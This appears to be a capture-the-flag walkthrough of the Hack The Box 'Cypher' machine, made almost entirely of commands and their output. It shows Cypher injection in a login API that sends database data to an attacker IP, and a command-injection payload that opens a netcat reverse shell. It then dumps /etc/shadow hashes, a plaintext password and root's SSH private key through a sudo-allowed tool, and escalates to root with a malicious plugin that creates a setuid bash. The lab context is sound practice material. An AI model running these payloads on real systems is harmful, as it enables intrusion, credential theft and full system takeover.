Last updated
└─$ feroxbuster -u 'http://cypher.htb/' -k -w /usr/share/seclists/Discovery/Web-Content/common.txt --thorough -n -D -C 404,403,400 -S 0,34
200 GET 126l 274w 3671c http://cypher.htb/login
200 GET 179l 477w 4986c http://cypher.htb/about
200 GET 3l 113w 8123c http://cypher.htb/bootstrap-notify.min.js
200 GET 63l 139w 1548c http://cypher.htb/utils.js
200 GET 2l 1293w 89664c http://cypher.htb/jquery-3.6.1.min.js
200 GET 12l 2173w 195855c http://cypher.htb/bootstrap.min.css
200 GET 7l 1223w 80496c http://cypher.htb/bootstrap.bundle.min.js
200 GET 876l 4886w 373109c http://cypher.htb/logo.png
200 GET 7333l 24018w 208204c http://cypher.htb/vivagraph.min.js
200 GET 162l 360w 4562c http://cypher.htb/
200 GET 5632l 33572w 2776750c http://cypher.htb/us.png
200 GET 162l 360w 4562c http://cypher.htb/index
200 GET 162l 360w 4562c http://cypher.htb/index.html
405 GET 1l 3w 31c http://cypher.htb/api/auth
200 GET 126l 274w 3671c http://cypher.htb/login.html
301 GET 7l 12w 178c http://cypher.htb/testing => http://cypher.htb/testing/└─$ curl http://cypher.htb/testing/custom-apoc-extension-1.0-SNAPSHOT.jar -LOs
└─$ jd-gui custom-apoc-extension-1.0-SNAPSHOT.jarMATCH (u:USER) -[:SECRET]-> (h:SHA1) WHERE u.name = 'USERNAME' return h.value as hash{
"username": "' OR 1=1 WITH 1337 AS x CALL db.labels() YIELD label AS d LOAD CSV FROM 'http://10.10.14.114/?'+d AS y RETURN 0 as _0//",
"password":"x"
}Injection: { "username":"admin' or 1=Date(keys(u)) return 1//", "password":"x" }
Returns: List{String("name")}Injection: { "username":"admin' or 1=Date(keys(h)) return 1//", "password":"x" }
Returns: List{String("value")}' OR 1=1 WITH 1 as _l00 CALL dbms.procedures() yield name LOAD CSV FROM 'https://10.10.14.114/' + name as _l RETURN 1 //{
"username": "admin' OR EXISTS { CALL custom.getUrlStatusCode('http://10.10.14.114') YIELD statusCode RETURN statusCode } RETURN 1//",
"password": "x"
}curl 'http://cypher.htb/api/auth' --json $'{"username":"admin\' OR EXISTS { CALL custom.getUrlStatusCode(\'http://10.10.14.114 ; busybox nc 10.10.14.114 4444 -e /bin/bash\') YIELD statusCode RETURN statusCode } RETURN 1//","password":"x"}'(remote) neo4j@cypher:/$ id
uid=110(neo4j) gid=111(neo4j) groups=111(neo4j)
(remote) neo4j@cypher:/var/www/graphasm$ cat /etc/passwd | grep sh$
root:x:0:0:root:/root:/bin/bash
graphasm:x:1000:1000:graphasm:/home/graphasm:/bin/bash
neo4j:x:110:111:neo4j,,,:/var/lib/neo4j:/bin/bash(remote) neo4j@cypher:/var/www/graphasm$ find /home -ls 2>/dev/null
393218 4 drwxr-xr-x 3 root root 4096 Oct 8 17:58 /home
393224 4 drwxr-xr-x 4 graphasm graphasm 4096 Feb 17 12:40 /home/graphasm
393225 4 -rw-r--r-- 1 graphasm graphasm 3771 Mar 31 2024 /home/graphasm/.bashrc
393226 4 -rw-r--r-- 1 graphasm graphasm 807 Mar 31 2024 /home/graphasm/.profile
444510 4 -rw-r----- 1 root graphasm 33 Mar 1 20:25 /home/graphasm/user.txt
393342 0 lrwxrwxrwx 1 root root 9 Oct 8 18:06 /home/graphasm/.bash_history -> /dev/null
393227 4 -rw-r--r-- 1 graphasm graphasm 220 Mar 31 2024 /home/graphasm/.bash_logout
393229 4 drwx------ 2 graphasm graphasm 4096 Oct 8 17:58 /home/graphasm/.ssh
444509 4 -rw-r--r-- 1 graphasm graphasm 156 Feb 14 12:35 /home/graphasm/bbot_preset.yml
393231 4 drwx------ 2 graphasm graphasm 4096 Oct 8 17:58 /home/graphasm/.cache
(remote) neo4j@cypher:/var/www/graphasm$ cat /home/graphasm/bbot_preset.yml
targets:
- ecorp.htb
output_dir: /home/graphasm/bbot_scans
config:
modules:
neo4j:
username: neo4j
password: cU4btyib.20xtCMCXkBmerhK└─$ sshpass -p 'cU4btyib.20xtCMCXkBmerhK' ssh graphasm@cypher.htb
graphasm@cypher:~$ id
uid=1000(graphasm) gid=1000(graphasm) groups=1000(graphasm)graphasm@cypher:~$ cat user.txt
db432ef16f45636e4570c8b3b44d7c4cgraphasm@cypher:~$ sudo -l
Matching Defaults entries for graphasm on cypher:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User graphasm may run the following commands on cypher:
(ALL) NOPASSWD: /usr/local/bin/bbotgraphasm@cypher:~$ sudo bbot --yes --debug --dry-run --custom-yara-rules /etc/passwd 2>&1 | grep sh$
[DBUG] internal.excavate: Final combined yara rule contents: root:x:0:0:root:/root:/bin/bash
graphasm:x:1000:1000:graphasm:/home/graphasm:/bin/bash
neo4j:x:110:111:neo4j,,,:/var/lib/neo4j:/bin/bashgraphasm@cypher:~$ sudo bbot --yes --debug --dry-run --custom-yara-rules /etc/shadow 2>&1 | grep '\$y'
[DBUG] internal.excavate: Final combined yara rule contents: root:$y$j9T$ianAmmc1w6VSodw.1fzgk/$3DenO5YJ1VBvE1VekRL79v6bN00fhcbA59zeeLciY67:20133:0:99999:7:::
graphasm:$y$j9T$lDLyqZAxCXhX1EB3v01Zl.$C0XwosQvBM.5sAPbHd8oyAK0e8lg0GX5YJHb7qImQV7:20004:0:99999:7:::graphasm@cypher:~$ sudo bbot --yes --debug --dry-run --custom-yara-rules /root/root.txt 2>&1 | grep 'yara rule'
[DBUG] internal.excavate: Successfully loaded custom yara rules file [/root/root.txt]
[DBUG] internal.excavate: Final combined yara rule contents: acde1a1d904c0f25e5cce9fc74e0c959graphasm@cypher:~$ ssh localhost -v
...
debug1: Authentications that can continue: publickey,password
debug1: Next authentication method: publickey
debug1: Will attempt key: /home/graphasm/.ssh/id_rsa
debug1: Will attempt key: /home/graphasm/.ssh/id_ecdsa
debug1: Will attempt key: /home/graphasm/.ssh/id_ecdsa_sk
debug1: Will attempt key: /home/graphasm/.ssh/id_ed25519
debug1: Will attempt key: /home/graphasm/.ssh/id_ed25519_sk
debug1: Will attempt key: /home/graphasm/.ssh/id_xmss
debug1: Will attempt key: /home/graphasm/.ssh/id_dsa
...graphasm@cypher:~$ for file in id_rsa id_ecdsa id_ecdsa_sk id_ed25519 id_ed25519_sk id_xmss id_dsa; do sudo bbot --yes --debug --dry-run --custom-yara-rules /root/.ssh/$file 2>&1 | sed -n '/contents:/,/\[DBUG\]/p'; done;
[DBUG] internal.excavate: Final combined yara rule contents: /root/.ssh/id_rsa
[DBUG] output.csv: Setting up module csv
[DBUG] internal.excavate: Final combined yara rule contents: /root/.ssh/id_ecdsa
[DBUG] output.csv: Setting up module csv
[DBUG] internal.excavate: Final combined yara rule contents: /root/.ssh/id_ecdsa_sk
[DBUG] output.csv: Setting up module csv
[DBUG] internal.excavate: Final combined yara rule contents: -----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACAgv21YFyMHuBWK6Rwrso22gu7RpL0BtLjfcO2KSBN+5AAAAJC3399Ut9/f
VAAAAAtzc2gtZWQyNTUxOQAAACAgv21YFyMHuBWK6Rwrso22gu7RpL0BtLjfcO2KSBN+5A
AAAEAGEVbsveMGqFEpPtwEUMqc39F1JisXxPdWVl9E7N0nFiC/bVgXIwe4FYrpHCuyjbaC
7tGkvQG0uN9w7YpIE37kAAAAC3Jvb3RAY3lwaGVyAQI=
-----END OPENSSH PRIVATE KEY-----
[DBUG] output.csv: Setting up module csv
[DBUG] internal.excavate: Final combined yara rule contents: /root/.ssh/id_ed25519_sk
[DBUG] output.csv: Setting up module csv
[DBUG] internal.excavate: Final combined yara rule contents: /root/.ssh/id_xmss
[DBUG] output.csv: Setting up module csv
[DBUG] internal.excavate: Final combined yara rule contents: /root/.ssh/id_dsa
[DBUG] output.csv: Setting up module csv└─$ nano root.id_ed25519
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACAgv21YFyMHuBWK6Rwrso22gu7RpL0BtLjfcO2KSBN+5AAAAJC3399Ut9/f
VAAAAAtzc2gtZWQyNTUxOQAAACAgv21YFyMHuBWK6Rwrso22gu7RpL0BtLjfcO2KSBN+5A
AAAEAGEVbsveMGqFEpPtwEUMqc39F1JisXxPdWVl9E7N0nFiC/bVgXIwe4FYrpHCuyjbaC
7tGkvQG0uN9w7YpIE37kAAAAC3Jvb3RAY3lwaGVyAQI=
-----END OPENSSH PRIVATE KEY-----
└─$ chmod 600 root.id_ed25519
└─$ ssh -i root.id_ed25519 root@cypher.htb
Warning: Permanently added 'cypher.htb' (ED25519) to the list of known hosts.
root@cypher.htb password:➜ .\john-1.9.0-jumbo-1-win64\run\john.exe .\hashes.txt --wordlist=.\wordlist.txt --format=cryptgraphasm@cypher:~$ cd `mktemp -d` && chmod 777 $_
graphasm@cypher:/tmp/tmp.lf21OiOLR3$ echo $'module_dirs:\n - '$(pwd) > letmein.yml
graphasm@cypher:/tmp/tmp.lf21OiOLR3$ echo $'from bbot.modules.base import BaseModule\nimport os\nclass letmein(BaseModule):\n\tasync def setup(self):\n\t\tos.system("install -m4777 /bin/bash /tmp/rootbash")\n\t\treturn True' > letmein.py
graphasm@cypher:/tmp/tmp.lf21OiOLR3$ sudo bbot -p ./letmein.yml -m letmein -y
graphasm@cypher:/tmp/tmp.lf21OiOLR3$ /tmp/rootbash -p
rootbash-5.2# id
uid=1000(graphasm) gid=1000(graphasm) euid=0(root) groups=1000(graphasm)